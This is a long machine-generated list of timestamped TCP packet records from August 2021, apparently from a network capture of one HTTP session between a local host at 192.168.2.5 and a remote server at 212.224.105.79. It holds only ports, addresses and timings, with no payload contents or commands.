Aug 24, 2021 08:49:17.321206093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321209908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321223021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321238995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321239948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321254969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321270943 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321274996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321291924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321297884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321306944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321325064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321335077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321341038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321360111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321363926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321377993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321393967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321399927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321420908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321435928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321439028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321455002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321471930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321479082 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321489096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321506023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321512938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321525097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321543932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321547031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321559906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321577072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321583986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321593046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321609974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321618080 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321643114 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321825027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321839094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321857929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321875095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321882010 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321890116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321907997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321918964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321923971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321943045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321943998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321959972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321975946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321983099 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321994066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322010994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322017908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322026968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322042942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322051048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322058916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322078943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322089911 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322097063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322113037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322122097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322129011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322144985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322156906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322160006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322175980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322185040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322192907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322208881 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322212934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322232008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322244883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322257996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322335958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322583914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322597980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322618008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322633982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322643995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322650909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322654009 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322666883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322685957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322694063 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322704077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322719097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322719097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322735071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322747946 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322751045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322767019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322771072 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322783947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322792053 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322804928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322812080 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322820902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322832108 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322838068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322854042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322854996 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322873116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322880030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322890043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322900057 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322905064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322921991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322927952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322937012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322947025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322952986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322968960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322973967 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.322983980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.322997093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323002100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323019028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323023081 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323035002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323045015 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323051929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323065996 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323067904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323081970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323090076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323097944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323111057 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323132992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323144913 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323151112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323158979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323170900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323177099 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323188066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323195934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323203087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323219061 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323220015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323232889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323240995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323246002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323256969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323267937 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323277950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323295116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323296070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323308945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323318005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323322058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323338985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323339939 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323350906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323362112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323363066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323374987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323384047 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323386908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323404074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323409081 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323420048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323427916 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323446989 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323470116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.323635101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323652983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.323697090 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.325124025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.346646070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346689939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346741915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346741915 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.346764088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346769094 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.346787930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346788883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.346807957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346811056 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.346827030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346842051 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.346846104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346864939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346877098 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.346883059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346903086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346921921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346942902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346963882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346981049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.346998930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347017050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347033024 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347037077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347039938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347048044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347049952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347052097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347063065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347074032 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347081900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347090006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347100973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347136974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347143888 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347148895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347160101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347178936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347186089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347197056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347217083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347224951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347235918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347259045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347263098 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347280979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347281933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347301006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347311974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347320080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347337961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347357035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347376108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347393990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347417116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347421885 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347429037 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347431898 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347434044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347439051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347450018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347457886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347470045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347479105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347492933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347496986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347516060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347516060 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347536087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347537041 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347554922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347574949 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347578049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347599030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347599030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347619057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347626925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347637892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347651005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347657919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347675085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347676992 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347693920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347704887 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347712994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347734928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347743034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347754955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347774982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347774982 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347795010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347795963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.347814083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347834110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347852945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347872019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347894907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347925901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347943068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347959995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347978115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347995043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.347999096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348004103 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348006964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348010063 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348011971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348011971 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348015070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348016977 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348018885 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348021030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348021984 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348026037 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348042965 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348062038 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348103046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348124027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348141909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348149061 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348159075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348171949 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348175049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348191977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348196983 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348206997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348222971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348232031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348238945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348253012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348258972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348275900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348287106 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348292112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348308086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348323107 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348325014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348340988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348347902 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348356962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348370075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348372936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348395109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348402023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348407984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348419905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348431110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348443031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348454952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348473072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348479986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348490000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348506927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348510027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348526955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348534107 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348545074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348562002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348562002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348578930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348582983 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348596096 CEST	80	49712	212.224.105.79	192.168.2.5
